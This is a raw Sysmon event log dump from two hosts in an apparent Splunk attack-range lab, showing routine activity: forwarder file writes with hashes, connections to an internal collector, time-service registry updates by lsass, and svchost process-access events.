10:54:24.525{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE6F66B01CC7C58656CF99DB4445F8F1,SHA256=2A5EAFBE6C1799B0DA58DA208B82F8B92F80114403A0629FD63B5EDC36AA14E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217265Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:24.201{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B6661D5EC5F3E3D21D572F4856FF709,SHA256=0E6C2F7D6A64920EA7D41B4125D9B8CFAA3F90344E2A847EF632E630106CF16E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:25.525{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCDBF546558B152C6083AAC14B663BB,SHA256=981C331E14E907D372D6DC44743F68B43A67B76CBECFD47ECDB6B1F527C42CF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217266Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:25.434{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C7CE55A50160DECDBD9B561ACA44548,SHA256=6A72C3DB0417F8166105EE393DD4299BFD512861CB74470619947A7C6014453D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217268Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:26.496{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937C0A9A5C859AF87B48DF1DBAEAAF86,SHA256=B6490468E577BE4761D7921CF42349DC4E5BA7776DA31586D3C0D0681362B5A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:24.600{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53530-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x8000000000000000289417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000289416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00821063) 13241300x8000000000000000289415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289b-0x57aa62f9) 13241300x8000000000000000289414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a3-0xb96ecaf9) 13241300x8000000000000000289413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ac-0x1b3332f9) 13241300x8000000000000000289412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x8000000000000000289411Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00821063) 13241300x8000000000000000289410Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8289b-0x57aa62f9) 13241300x8000000000000000289409Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d828a3-0xb96ecaf9) 13241300x8000000000000000289408Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-SetValue2022-02-23 10:54:26.678{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d828ac-0x1b3332f9) 23542300x8000000000000000289407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:26.531{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC406B4ADE6AC1D0AA86802EFEB0E1F5,SHA256=99C7BB32D350FB15B2339C16C49B56E3E42EDE2617F89F2F5384F7215CBA07C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217267Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:23.646{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51383-false10.0.1.12-8000- 23542300x8000000000000000217269Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:27.714{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCA00483F2F1A607219AEB3181998804,SHA256=592C6909311FF2D47E4268D1A7DF5CCA4309D6D4C486784C2C4D6DA107FFB847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:27.532{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014343AE585FB61835AA305F25D1E87C,SHA256=2D9F1B55A80251373160A18A98102FF3E7E97F7070F491E87E45F1C304459B41,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217270Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:28.948{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DFBF7BEFC3E562B9920D176AE6016AB,SHA256=F1C6192F662855C37AFABF0EC7B8E3F050C742444F2CE513A3CC2FC5E8DA4AA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:28.532{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F06B491E590ED54CBC24FCAF518CCA5,SHA256=2DF208224A0C6689AE96356B8451FEFF399EB304A18BBCB7AE5257EF1E22FC6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:29.547{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=800535848272D569E39BB6499D2277DA,SHA256=CBFE9274D250D9F8A0EEA42493D3047946CC4BE14D615512BBE3C6FD47F638E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:30.577{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06DDF7CD5D148740A6808F7F1E78F7F6,SHA256=CD388F7F7500EA7FDC9F1B1EDB359E529799A676B98B54523AEC6591942EFEEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217272Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:30.323{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=AF885A47AACA1A502F9A9918B401C13C,SHA256=71517036C494AB4C550A66ABB157BBCAF1CD8F5A33F4D602FEAC8147CA682B05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217271Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:30.041{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A5A6B9AE576CC31203BC75B4418927A,SHA256=FCC51FC82E1F08BD8B23207F94BDE1B14664FBD78AD02008709C446CBF0621CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:29.719{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53531-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:31.598{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F8703BE659B648099A4E350EB6AD6A0,SHA256=B253099A422E25A1C5BE209D7F07B43A49F4C71C248B73CE968CB489C5EC35DD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217274Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:29.519{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51384-false10.0.1.12-8000- 23542300x8000000000000000217273Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:31.057{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01904EEF5C016D19B6A362677B8AA375,SHA256=B4EEFB162C866E18D978FEAF67850C5203EA9A221214A658F763EEB4D00CA63B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:32.603{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=809073F8B8A2EEB023C6678C4147FABC,SHA256=E050EA6F373894B1F1648AE1E434387AF7DA858B9F87FCE37737517A150F0106,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217278Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:32.713{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217277Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:32.713{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217276Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:32.713{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11C-6215-1300-000000003902}832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217275Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:32.073{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=293FF000AA6C819A9A4C6D85C4D28034,SHA256=36C7FD36B39306730BFF62A39F2917E74B74A2A449158F8FB0E6FB010040DF07,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:33.619{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E718DFA7146D56F9ED6F44D69844145,SHA256=E4D86A6E11B8B253C487718990939D0A4A0E82C35D24F1DC67CA8C81240EAC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217279Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:33.088{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56AA4A704E511115238BB55FEDD11F6C,SHA256=2B62AA193EBBBD8C9BED5BE25BC82D96FA2724BE0D42BAAD3094684A2474BA4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:33.365{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=8BEB18C26A88396565E4CFA24C1EFCB0,SHA256=F1B739E650A5155080111549C27F4790208390E15BA4AFDCD143566F055AEA17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:34.634{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73BAFB655987EF4FE6B563D44A24EC80,SHA256=2827FE5464FFC973CB2C207FE15C797066DC89850668E708336E32A9B6AE5E00,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217280Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:34.119{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=753E876BDA68430A2A1B6336EEA4BC87,SHA256=34AC9D2474EB9C41E5E575E905E6669E34495A7C5A6C9B555FE503C168B65A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:35.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF529C42FF852F00A0DAF67C7FA4A12F,SHA256=3E3EDFA2D258270607A0616A5AB0367A2176A60AC9B3B0BA7222EA0473EA5766,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217281Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:35.135{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38758D43E0B3D91A60F178AB1CC65C00,SHA256=D20FED1209CC323B2B534752ADC6A16E40202CDF287A3C33023097D10724BD9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:36.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7D3A094001CDA6C0AAC2F0DE88BBA3A,SHA256=DFEA5D870CFD26B8BB4BA2C2F71CF933DC2EC3814A676358D29C84EEE6FDE4AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217283Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:34.564{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51385-false10.0.1.12-8000- 23542300x8000000000000000217282Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:36.369{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7459FCF4F2BA14E10A735E6A437E41AE,SHA256=FEC8A7C3B9ACDE2452F5E3B4DA047658EB16F6D659EB3E6F415CE71B166A2666,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:35.596{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53532-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:37.640{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F261B737E9E7E84E9591512B2ADFB0FF,SHA256=DFC5D8D4A53E74BAF19B94B96BE9BDDD3DF0FCC3961BF815970718580F437DA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217284Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:37.385{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3C06940F4C8ACAAAEDFCA4181834D00,SHA256=76C4FD11646D416C4B2B7F773D2D777DC70E61CD1425BDDD717DF67E06225468,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:38.655{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65941F20160EBBD2E0D727F1E3CDA333,SHA256=DF9FAD86F32980A3D01988BFD762AF7095CAE30861202983DED8465B21F9A054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217285Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:54:38.463{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9462FA4F06678A7D309FAABF4291613,SHA256=64B76053E8CB82BE29566F55DEF95E34EC7D0B5785B2EA54FA4EE5642C2BC85F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:39.908{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:54:39.655{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 